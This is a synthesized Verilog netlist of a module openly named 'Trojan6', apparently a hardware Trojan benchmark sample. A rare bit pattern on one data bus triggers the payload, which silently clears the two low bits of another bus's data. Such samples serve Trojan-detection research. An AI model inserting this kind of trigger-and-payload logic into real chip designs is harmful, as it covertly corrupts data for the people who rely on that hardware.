/* Generated by Yosys 0.51+107 (git sha1 f03b44959, g++ 14.2.1 -fPIC -O3) */

module Trojan6(m0_data_o, i_s15_data_o, i_s15_data_o_TrojanPayload);
  wire _00_;
  wire _01_;
  wire _02_;
  wire _03_;
  wire _04_;
  wire _05_;
  wire _06_;
  wire _07_;
  wire _08_;
  wire _09_;
  wire _10_;
  wire _11_;
  wire _12_;
  wire _13_;
  wire _14_;
  wire _15_;
  wire _16_;
  wire _17_;
  wire _18_;
  wire _19_;
  wire _20_;
  wire _21_;
  wire _22_;
  wire _23_;
  wire _24_;
  wire _25_;
  wire _26_;
  wire _27_;
  wire _28_;
  wire _29_;
  wire _30_;
  wire _31_;
  input [31:0] i_s15_data_o;
  wire [31:0] i_s15_data_o;
  output [31:0] i_s15_data_o_TrojanPayload;
  wire [31:0] i_s15_data_o_TrojanPayload;
  input [31:0] m0_data_o;
  wire [31:0] m0_data_o;
  \not  _32_ (
    .A(m0_data_o[27]),
    .Y(_00_)
  );
  \and  _33_ (
    .A(m0_data_o[29]),
    .B(m0_data_o[20]),
    .Y(_01_)
  );
  \and  _34_ (
    .A(m0_data_o[11]),
    .B(m0_data_o[15]),
    .Y(_02_)
  );
  \and  _35_ (
    .A(_01_),
    .B(_02_),
    .Y(_03_)
  );
  \and  _36_ (
    .A(m0_data_o[10]),
    .B(m0_data_o[8]),
    .Y(_04_)
  );
  \and  _37_ (
    .A(m0_data_o[22]),
    .B(m0_data_o[28]),
    .Y(_05_)
  );
  \and  _38_ (
    .A(_04_),
    .B(_05_),
    .Y(_06_)
  );
  \and  _39_ (
    .A(_03_),
    .B(_06_),
    .Y(_07_)
  );
  \nand  _40_ (
    .A(m0_data_o[13]),
    .B(m0_data_o[14]),
    .Y(_08_)
  );
  \nand  _41_ (
    .A(m0_data_o[3]),
    .B(m0_data_o[7]),
    .Y(_09_)
  );
  \and  _42_ (
    .A(_08_),
    .B(_09_),
    .Y(_10_)
  );
  \nand  _43_ (
    .A(m0_data_o[21]),
    .B(m0_data_o[23]),
    .Y(_11_)
  );
  \and  _44_ (
    .A(_00_),
    .B(m0_data_o[2]),
    .Y(_12_)
  );
  \and  _45_ (
    .A(_11_),
    .B(_12_),
    .Y(_13_)
  );
  \and  _46_ (
    .A(_10_),
    .B(_13_),
    .Y(_14_)
  );
  \and  _47_ (
    .A(_07_),
    .B(_14_),
    .Y(_15_)
  );
  \and  _48_ (
    .A(m0_data_o[30]),
    .B(m0_data_o[31]),
    .Y(_16_)
  );
  \and  _49_ (
    .A(m0_data_o[6]),
    .B(m0_data_o[17]),
    .Y(_17_)
  );
  \and  _50_ (
    .A(_16_),
    .B(_17_),
    .Y(_18_)
  );
  \and  _51_ (
    .A(m0_data_o[18]),
    .B(m0_data_o[9]),
    .Y(_19_)
  );
  \and  _52_ (
    .A(m0_data_o[24]),
    .B(m0_data_o[26]),
    .Y(_20_)
  );
  \and  _53_ (
    .A(_19_),
    .B(_20_),
    .Y(_21_)
  );
  \and  _54_ (
    .A(_18_),
    .B(_21_),
    .Y(_22_)
  );
  \nand  _55_ (
    .A(m0_data_o[12]),
    .B(m0_data_o[16]),
    .Y(_23_)
  );
  \nand  _56_ (
    .A(m0_data_o[4]),
    .B(m0_data_o[5]),
    .Y(_24_)
  );
  \and  _57_ (
    .A(_23_),
    .B(_24_),
    .Y(_25_)
  );
  \and  _58_ (
    .A(m0_data_o[0]),
    .B(m0_data_o[1]),
    .Y(_26_)
  );
  \nand  _59_ (
    .A(m0_data_o[19]),
    .B(m0_data_o[25]),
    .Y(_27_)
  );
  \and  _60_ (
    .A(_26_),
    .B(_27_),
    .Y(_28_)
  );
  \and  _61_ (
    .A(_25_),
    .B(_28_),
    .Y(_29_)
  );
  \and  _62_ (
    .A(_22_),
    .B(_29_),
    .Y(_30_)
  );
  \nor  _63_ (
    .A(_15_),
    .B(_30_),
    .Y(_31_)
  );
  \and  _64_ (
    .A(i_s15_data_o[0]),
    .B(_31_),
    .Y(i_s15_data_o_TrojanPayload[0])
  );
  \and  _65_ (
    .A(i_s15_data_o[1]),
    .B(_31_),
    .Y(i_s15_data_o_TrojanPayload[1])
  );
  assign i_s15_data_o_TrojanPayload[31:2] = i_s15_data_o[31:2];
endmodule
